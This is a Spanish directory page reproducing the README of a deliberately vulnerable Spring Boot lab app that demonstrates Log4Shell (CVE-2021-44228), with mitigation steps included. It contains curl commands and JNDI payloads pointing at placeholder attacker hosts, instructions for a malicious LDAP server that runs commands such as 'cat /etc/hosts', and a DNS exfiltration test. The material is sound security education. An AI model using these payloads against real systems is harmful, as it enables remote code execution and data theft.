Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j2-bugmaker — Demostración de CVE-2021-44228 Log4Shell. | Kitploit
Herramientas/GitHubGitHub/mintimate/log4j2-bugmaker
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso RemotoLabs y Práctica
GitHubmintimate/log4j2-bugmaker

log4j2-bugmaker

Demostración de CVE-2021-44228 Log4Shell.

Ver Repositorio
1hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Log4j2-BugMaker

Proyecto de demostración de la vulnerabilidad Log4Shell (CVE-2021-44228)

Este es un proyecto de demostración para estudiar e investigar la vulnerabilidad de ejecución remota de código en Log4j2 (Log4Shell).

⚠️ Advertencia de seguridad

Este proyecto está destinado únicamente a fines de investigación y educación sobre seguridad. ¡No lo utilice en entornos de producción!

Este proyecto utiliza la versión Log4j 2.14.1, que contiene graves vulnerabilidades de seguridad.

📋 Configuración del entorno

  • Spring Boot: 2.6.1
  • Log4j2: 2.14.1 (versión vulnerable)
  • Java: 8 (JDK 1.8)

🚀 Inicio rápido

1. Compilar el proyecto

root@kitploit:~
./mvnw clean package

2. Ejecutar la aplicación

Descargar herramienta
root@kitploit:~
./mvnw spring-boot:run

O bien:

root@kitploit:~
java -jar target/log4j2-bugmaker-0.0.1-SNAPSHOT.jar

3. Acceder a la aplicación

Abra el navegador y visite: http://localhost:8080

🎯 Endpoints de vulnerabilidad

1. Inyección en la cabecera User-Agent

root@kitploit:~
curl -H "User-Agent: \${jndi:ldap://attacker.com/a}" http://localhost:8080/api/log

2. Inyección en parámetros de consulta

root@kitploit:~
curl "http://localhost:8080/api/search?query=\${jndi:ldap://attacker.com/a}"

3. Comprobación de estado (sin vulnerabilidad)

root@kitploit:~
curl http://localhost:8080/api/health

💡 Principio de la vulnerabilidad

Log4Shell (CVE-2021-44228) es una vulnerabilidad crítica en Apache Log4j2. Cuando la aplicación registra entradas de usuario que contienen cadenas con formato especial, Log4j2 interpreta expresiones de búsqueda JNDI, y un atacante puede aprovechar esta característica para ejecutar código remoto.

Ejemplos de carga maliciosa

root@kitploit:~
${jndi:ldap://evil.com/a}
${jndi:rmi://evil.com/a}
${jndi:dns://evil.com/a}

Cargas de prueba (seguras)

root@kitploit:~
${java:version}
${java:os}
${env:PATH}

🔧 Pasos de prueba

  1. Inicie la aplicación
  2. Envíe una solicitud que contenga una expresión JNDI
  3. Observe los registros en la consola para ver el comportamiento de análisis de Log4j2

🛡️ Soluciones de corrección

Solución 1: Actualizar la versión de Log4j2

Actualice Log4j2 a la versión 2.17.1 o superior:

root@kitploit:~
<properties>
    <log4j2.version>2.17.1</log4j2.version>
</properties>

Solución 2: Establecer parámetros JVM

root@kitploit:~
-Dlog4j2.formatMsgNoLookups=true

Solución 3: Eliminar la clase JndiLookup

root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

🚀 Demostración de ejecución remota de código

Método 1: Usar las herramientas proporcionadas (recomendado)

root@kitploit:~
# 1. Ejecutar el script de automatización
./setup-exploit-server.sh

# 2. Seleccionar la herramienta JNDI-Injection-Exploit
# 3. Introducir el comando a ejecutar (por ejemplo, whoami o cat /etc/hosts)
# 4. En otra terminal, enviar la carga maliciosa

Método 2: Usar un servidor LDAP en Python

root@kitploit:~
# Iniciar un servidor LDAP malicioso
python3 simple-ldap-server.py "whoami"

# O ejecutar otro comando
python3 simple-ldap-server.py "cat /etc/hosts"

# En otra terminal, enviar la carga maliciosa
curl -H 'User-Agent: ${jndi:ldap://YOUR_IP:1389/Exploit}' http://localhost:8080/api/log

Método 3: Verificación por DNS out-of-band (sin necesidad de montar un servidor)

root@kitploit:~
# Ejecutar el script de prueba de exfiltración por DNS
./test-dns-exfiltration.sh

# Siga las instrucciones, visite dnslog.cn para obtener un subdominio
# Luego compruebe si se recibe una solicitud de consulta DNS

📚 Referencias

  • Detalles de CVE-2021-44228
  • Boletín de seguridad de Apache Log4j
  • Advertencia de CISA
  • JNDI-Injection-Exploit
  • JNDIExploit

📝 Licencia

Este proyecto está bajo la licencia MIT License.

Declaración especial: Este proyecto es solo para fines educativos y de investigación en seguridad. El usuario asume todos los riesgos derivados de su uso.

⚠️ Aviso legal

Realizar pruebas de penetración en sistemas de terceros sin autorización es ilegal. Este proyecto está destinado únicamente a:

  • Estudiar en su propio entorno de pruebas
  • Pruebas de seguridad autorizadas
  • Fines de investigación y educación en seguridad

Respete las leyes y regulaciones locales y utilice estos conocimientos de manera responsable.